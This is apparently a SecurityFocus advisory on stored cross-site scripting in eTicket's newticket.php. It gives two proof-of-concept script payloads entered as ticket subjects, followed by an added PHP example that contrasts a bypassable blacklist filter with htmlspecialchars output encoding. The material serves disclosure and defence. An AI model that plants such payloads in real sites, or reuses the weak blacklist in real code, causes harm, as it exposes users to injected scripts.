eTicket 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities

An attacker can use standard tools to exploit these issues.

The following proof-of-concept examples are available:

For eTicket 1.5.6-RC3: Create a ticket with the subject <SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>
For eTicket 1.5.6-RC2: Create a ticket with the subject <script>alert(123)</script>
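
An added example (not eTicket code and not part of the original advisory): the two subjects above are run through a hypothetical case-sensitive blacklist filter and through HTML output encoding with htmlspecialchars(), showing that only encoding at output neutralises both. The function names and the blacklist itself are assumptions made for illustration.

```php
<?php
// Added example: not eTicket source code. All function names are hypothetical.

// The two ticket subjects quoted in the advisory, used here only as test input.
$subjects = [
    '1.5.6-RC2' => '<script>alert(123)</script>',
    '1.5.6-RC3' => '<SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>',
];

// Hypothetical blacklist filter (an assumption, not eTicket's code):
// case-sensitive removal of script tags and quote characters.
function naive_filter(string $s): string
{
    return str_replace(['<script>', '</script>', '"', "'"], '', $s);
}

// Contextual output encoding for an HTML text node or quoted attribute.
function encode_for_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// True if the string would still open a script element when written into HTML.
function contains_script_tag(string $html): bool
{
    return preg_match('/<\s*script\b/i', $html) === 1;
}

foreach ($subjects as $version => $subject) {
    $filtered = naive_filter($subject);
    $encoded  = encode_for_html($subject);
    printf(
        "%s\n  blacklist: %s => %s\n  encoded:   %s => %s\n",
        $version,
        $filtered,
        contains_script_tag($filtered) ? 'still executable' : 'neutralised',
        $encoded,
        contains_script_tag($encoded) ? 'still executable' : 'neutralised'
    );
}
```

The blacklist leaves the upper-case, quote-free subject intact, while the encoded form of both subjects is rendered as inert text. The subject should be encoded at every point where it is written into a page, not only on the submission form.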


 

Copyright 2010, SecurityFocus